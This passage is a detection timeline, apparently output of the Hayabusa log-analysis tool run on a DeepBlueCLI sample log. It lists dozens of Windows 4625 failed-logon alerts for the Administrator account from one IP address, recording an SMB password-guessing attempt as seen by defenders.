+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.416 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
